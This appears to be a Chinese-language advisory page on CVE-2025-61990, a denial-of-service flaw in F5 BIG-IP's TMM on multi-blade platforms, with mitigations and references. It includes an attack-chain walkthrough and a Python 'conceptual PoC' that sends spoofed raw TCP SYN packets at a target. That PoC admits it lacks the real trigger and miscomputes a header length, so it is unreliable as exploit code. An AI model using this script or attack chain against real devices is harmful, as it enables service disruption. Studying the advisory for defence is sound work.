CVE-2025-61990：F5 BIG-IP多刀片平台TMM拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61990

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP（Traffic Management Microkernel / TMM）

漏洞概述

CVE-2025-61990是F5公司于2025年10月15日披露的一个高危安全漏洞，存在于F5 BIG-IP产品的流量管理微内核（Traffic Management Microkernel，简称TMM）中。该漏洞的CVSS 3.1评分为7.5分，严重等级为HIGH。漏洞影响所有使用多刀片（multi-bladed）硬件平台部署的F5 BIG-IP设备，即包含多个刀片（blade）的硬件平台。当此类平台上的TMM处理某些未公开披露的特定网络流量时，会触发TMM进程异常终止，从而导致整个设备或受影响刀片上的流量处理服务中断，造成拒绝服务（DoS）攻击效果。值得注意的是，该漏洞不需要任何身份认证、不需要用户交互，且可通过网络远程触发，攻击门槛极低。F5官方已在安全公告K000156912中发布了修复方案，并明确说明已到达技术支持终止（End of Technical Support, EoTS）阶段的软件版本不再进行评估和修复。受该漏洞影响的主要产品线包括F5 BIG-IP的各种硬件平台版本，涵盖14.x、15.x、16.x和17.x等主流版本线。用户应及时检查自身部署环境并按照官方建议进行升级或修复，以避免遭受潜在的拒绝服务攻击。

技术细节

F5 BIG-IP的TMM（Traffic Management Microkernel）是运行在数据平面上的核心流量处理引擎，负责处理所有进出设备的网络流量，包括负载均衡、SSL卸载、流量整形、安全策略执行等关键功能。在多刀片硬件平台（如VIPRION系列）中，多个刀片协同工作以提供更高的吞吐量和冗余能力，每个刀片上都运行独立的TMM实例。

该漏洞的根本原因在于TMM在处理特定类型的网络流量时存在缺陷。当多刀片平台上的TMM接收到某些未公开披露特征的网络流量（undisclosed traffic）时，会触发TMM进程内部的异常处理路径，导致TMM进程崩溃（crash）或异常终止（terminate）。由于TMM是数据平面的核心进程，其终止将直接导致该刀片无法处理任何网络流量，造成服务中断。

从CVSS向量分析，该漏洞具有以下特征：
- 攻击向量为网络（AV:N），攻击者可通过远程网络发起攻击；
- 攻击复杂度低（AC:L），无需特殊条件即可触发；
- 无需权限（PR:N），攻击前不需要获取任何凭证；
- 无需用户交互（UI:N），可实现完全自动化攻击；
- 对机密性无影响（C:N）、对完整性无影响（I:N）、对可用性影响高（A:H）。

漏洞利用的核心在于构造能够触发TMM异常处理逻辑的特定网络流量。由于具体触发条件尚未完全公开，攻击者需要通过逆向分析或模糊测试等手段发现具体的触发数据包特征。一旦发现，攻击者可编写自动化脚本持续发送恶意流量，使目标TMM反复崩溃，造成持续的拒绝服务。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过Shodan、Censys等网络空间搜索引擎或主动扫描，识别暴露在互联网上的F5 BIG-IP多刀片硬件平台（如VIPRION系列），确认目标设备型号、软件版本及开放的服务端口。

STEP 2

步骤2：流量特征分析

攻击者通过逆向分析TMM固件或使用模糊测试工具（如AFL、Boofuzz）对TMM进行测试，发现能够触发TMM进程异常终止的特定网络流量模式或数据包构造方式。

STEP 3

步骤3：构造恶意流量

根据分析结果，攻击者编写脚本构造特定的网络数据包，这些数据包携带能够触发TMM内部异常处理路径的特征，可能涉及TCP选项畸形、协议状态机异常或特定的应用层负载。

STEP 4

步骤4：发送攻击流量

攻击者通过远程网络向目标F5 BIG-IP设备的虚拟服务器IP地址发送构造好的恶意流量。由于漏洞无需认证且无需用户交互，攻击可以完全自动化执行。

STEP 5

步骤5：TMM进程终止

目标设备上的TMM进程在接收到恶意流量后触发内部异常，导致进程崩溃或异常终止。受影响刀片上的所有流量处理服务中断，设备进入降级或故障状态。

STEP 6

步骤6：拒绝服务效果

由于TMM是BIG-IP数据平面的核心组件，其终止导致通过该设备的所有业务流量无法被处理，实现拒绝服务攻击效果。多刀片平台上的其他刀片虽然可能仍能运行，但整体服务能力大幅下降。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61990 - F5 BIG-IP TMM DoS PoC (Conceptual)
# Vulnerability: TMM termination on multi-bladed platforms via undisclosed traffic
# CVSS: 7.5 (HIGH) | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
# Affected: F5 BIG-IP multi-bladed hardware platforms (VIPRION series)
#
# Note: This is a conceptual PoC. The exact triggering traffic pattern
# has not been publicly disclosed by F5. Researchers need to perform
# fuzzing or reverse engineering to identify the specific packet
# characteristics that trigger TMM termination.

import socket
import struct
import random
import time

TARGET_HOST = "192.168.1.100"  # F5 BIG-IP VIPRION management/data IP
TARGET_PORT = 443              # Target service port (e.g., HTTPS virtual server)
PACKET_COUNT = 1000            # Number of crafted packets to send
DELAY = 0.01                   # Delay between packets (seconds)

def craft_malicious_packet():
    """
    Craft a network packet designed to trigger TMM abnormal termination.
    The exact triggering pattern is undisclosed; this demonstrates a
    generic approach using malformed/edge-case traffic patterns.
    """
    # TCP SYN with unusual options or fragment patterns
    # may trigger edge-case handling in TMM
    src_port = random.randint(1024, 65535)
    seq_num = random.randint(0, 4294967295)
    ack_num = 0

    # TCP header with crafted flags/options
    data_offset = 5  # 20 bytes header
    flags = 0x02     # SYN flag
    window = 65535

    tcp_header = struct.pack('!HHIIBBHHH',
        src_port, TARGET_PORT,
        seq_num, ack_num,
        (data_offset << 4), flags,
        window, 0, 0)

    # IP header
    ip_header = struct.pack('!BBHHHBBH4s4s',
        0x45, 0,           # Version/IHL, TOS
        40 + len(tcp_header),  # Total length
        random.randint(0, 65535),  # ID
        0x4000,            # Flags (Don't Fragment)
        64,                # TTL
        6,                 # Protocol (TCP)
        0,                 # Checksum (calculated by OS)
        socket.inet_aton('10.0.0.1'),  # Source IP (spoofed)
        socket.inet_aton(TARGET_HOST)  # Destination IP
    )

    return ip_header + tcp_header

def send_exploit_traffic():
    """
    Send crafted traffic to trigger TMM termination on multi-bladed platform.
    """
    print(f"[*] Targeting F5 BIG-IP at {TARGET_HOST}:{TARGET_PORT}")
    print(f"[*] Sending {PACKET_COUNT} crafted packets...")

    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)

    for i in range(PACKET_COUNT):
        try:
            packet = craft_malicious_packet()
            sock.sendto(packet, (TARGET_HOST, 0))
            if i % 100 == 0:
                print(f"[+] Sent {i}/{PACKET_COUNT} packets")
            time.sleep(DELAY)
        except Exception as e:
            print(f"[-] Error sending packet {i}: {e}")

    print("[*] Exploit traffic sent. Check target TMM status.")
    sock.close()

if __name__ == "__main__":
    send_exploit_traffic()

影响范围

F5 BIG-IP 14.x（具体受影响的子版本请参考F5官方公告K000156912）

F5 BIG-IP 15.x（具体受影响的子版本请参考F5官方公告K000156912）

F5 BIG-IP 16.x（具体受影响的子版本请参考F5官方公告K000156912）

F5 BIG-IP 17.x（具体受影响的子版本请参考F5官方公告K000156912）

F5 BIG-IP多刀片硬件平台（VIPRION系列）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在网络边界部署流量清洗设备或WAF，对进入BIG-IP的流量进行深度检测和过滤，尝试阻断可能导致TMM异常的特定流量模式；2）配置访问控制策略，限制仅允许可信源IP地址访问BIG-IP的数据平面服务端口；3）启用BIG-IP内置的DoS防护配置文件，设置合理的连接速率限制和异常流量检测阈值；4）在多刀片平台上配置HA冗余，确保单个刀片TMM崩溃后流量能够自动切换至其他正常刀片；5）密切监控TMM进程状态和系统日志，设置实时告警以便在TMM异常终止时快速响应和恢复；6）联系F5技术支持获取针对该漏洞的临时热修复（hotfix）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61990
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61990
3 Details https://www.cvedetails.com/cve/CVE-2025-61990/
4 VulDB https://vuldb.com/cve/CVE-2025-61990
5 Link https://my.f5.com/manage/s/article/K000156912